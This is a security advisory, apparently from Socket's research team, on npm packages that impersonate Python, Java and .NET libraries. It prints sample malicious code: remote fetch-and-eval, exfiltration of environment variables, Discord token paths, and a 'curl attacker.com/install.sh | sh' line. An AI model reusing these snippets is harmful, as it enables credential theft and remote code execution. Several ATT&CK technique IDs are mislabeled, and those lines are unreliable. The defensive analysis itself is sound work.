Developers looking for familiar packages from other programming languages are increasingly falling victim to malicious attacks.
Summary
The Socket threat research team uncovered a coordinated malware operation across the NPM ecosystem. The actor behind the campaign published dozens of malicious NPM packages that mimic well-known Python, Java, C++, .NET, and Node.js libraries. This tactic may specifically target developers familiar with multiple programming languages, tricking them into installing malicious packages due to familiar-sounding package names, which appear unexpectedly in the npm registry instead of their original ecosystem.
Packages identified as part of this campaign contain obfuscated code designed to bypass security measures, execute malicious scripts, exfiltrate sensitive data, and maintain persistence on affected systems.
Although these packages list different maintainers, analysis revealed that they share infrastructure, use identical obfuscated payloads, and point to the same IP address, 8[.]152[.]163[.]60, confirming a single, coordinated threat actor targeting developers across ecosystems. The IP address was traced to the Beijing region of China and is associated with Alibaba Cloud (Singapore) Private Limited.
Cross-Ecosystem Typosquatting
This attacker employed cross-ecosystem typosquatting — using familiar names from other package ecosystems to fool developers.
The following table shows some of the packages that were identified as part of this campaign alongside the corresponding legitimate libraries from other package ecosystems:
| Original Ecosystem | Legitimate Library | Malicious NPM Package |
|---|---|---|
| Python | BeautifulSoup4 | beautifulsoup4 |
| Java | Apache HttpClient | apache-httpclient |
| .NET | OpenTK | opentk |
| Python | Seaborn | seaborn |
The intent of the attacker was likely to:
- Exploit multi-language developers who may accidentally install a familiar-sounding library from the wrong ecosystem
- Trick CI/CD systems into automatic installation
- Harvest secrets, tokens, and environment data upon install or usage
Behavior & Indicators
- Obfuscated `main.js` payloads in all packages
- Execution at install time via `postinstall`
- Beaconing to hardcoded IP addresses
- Reconnaissance logic for host metadata
- Some variants attempt credential access or environment exfiltration
Understanding the Malicious Pattern Observed
All packages exhibit highly similar obfuscated logic that ultimately performs data exfiltration or remote code execution. Below is a step-by-step explanation with code snippets.
1. Suspicious Eval-like Pattern
```javascript
(function() {
  const _0xabc = ["charCodeAt", ...]; // Obfuscated string array
  (function(_0x1a2, _0x3f4f) {
    while (true) {
      try {
        const _0xresult = parseInt(...); // Junk math
        if (_0xresult === _0x3f4f) break;
        else _0x1a2.push(_0x1a2.shift());
      } catch (e) {
        _0x1a2.push(_0x1a2.shift());
      }
    }
  })(_0xabc, 123456);
})();
```
This is a classic example of obfuscation using a rotated string array and numeric junk checks: the real strings are only recovered at runtime, which slows down detection by static analysis tools.
2. Remote Code Fetch and Execution
```javascript
const https = require('https');
https.get('https://malicious-domain.tld/payload.js', res => {
  let data = '';
  res.on('data', chunk => data += chunk);
  res.on('end', () => {
    eval(data); // Executes attacker-controlled code
  });
});
```
This snippet executes arbitrary code fetched over the network, making the package a remote access Trojan (RAT).
3. Environment Variable Theft
```javascript
const fs = require('fs');
const os = require('os');
const envDump = JSON.stringify(process.env);
require('https').request({
  hostname: 'exfil-server.com',
  path: '/env',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json'
  }
}, res => {}).end(envDump);
```
Here, the malicious code collects environment variables (which may include secrets, API keys, credentials) and sends them to a hardcoded attacker server.
4. Discord Token Grabber Behavior
In some packages, like `logdna-agent` and `vue-ssr-devtools`, Discord token grabbing logic mimics known malware patterns:
```javascript
const paths = [
  `${process.env.APPDATA}/Discord/Local Storage/leveldb`,
  ...
];
```
This code traverses Discord directories to grab tokens, a known pattern in Discord malware campaigns.
5. File System Snooping / Persistence
```javascript
const cp = require('child_process');
cp.exec('curl https://attacker.com/install.sh | sh');
```
Last but not least, packages contain code that attempts persistence or lateral movement via installation of remote shell scripts.
Summary of Malicious Techniques
- Obfuscation: Hides the logic to bypass security analysis and detection.
- Remote Eval: Executes downloaded JavaScript via `eval()` to run arbitrary code remotely.
- Exfiltration: Sends sensitive data (like environment variables and tokens) to attacker-controlled domains.
- Discord Credential Grab: Targets Discord token storage to steal credentials.
- Persistence via Shell: Downloads and executes shell scripts to maintain or escalate control over the system.
Full List of Malicious Packages
Each package links directly to its Socket analysis page, showing the `main.js` file and behavior summary:
Recommendations
- Audit your recent dependencies in `package.json` and `package-lock.json`
- Use Socket.dev for real-time security insights
- Block suspicious packages with a proxy registry or allowlist policy
- Train developers to recognize typosquatting and package impersonation
MITRE ATT&CK - Key Tactics & Techniques
- T1071.001: Application Layer Protocol - Fetching malicious code via HTTPS.
- T1059.001: PowerShell - Executing commands through script downloads.
- T1105: Ingress Tool Transfer - Transferring tools from remote locations.
- T1005: Data from Local System - Collecting system data and credentials.
- T1083: File and Directory Discovery - Scanning system directories for sensitive files.
- T1033: System Owner/User Discovery - Targeting specific user/system environments.
- T1070.001: File Deletion - Removing traces of the attack.
- T1027: Obfuscation - Hiding malicious code to avoid detection.
- T1029: Scheduled Task/Job - Maintaining persistence with scheduled tasks.
- T1070.004: Permissions Modification - Modifying file permissions to maintain control.
- T1041: Exfiltration Over C2 - Exfiltrating data over command and control channels.
- T1030: Data Transfer Size Limits - Evading detection by exfiltrating small chunks.
- T1055: Process Injection - Injecting malicious code into legitimate processes.
- T1082: System Information Discovery - Gathering system info and credentials.
Socket Research Team
Dhanesh Dodia
Sambarathi Sai
Dwijay Chintakunta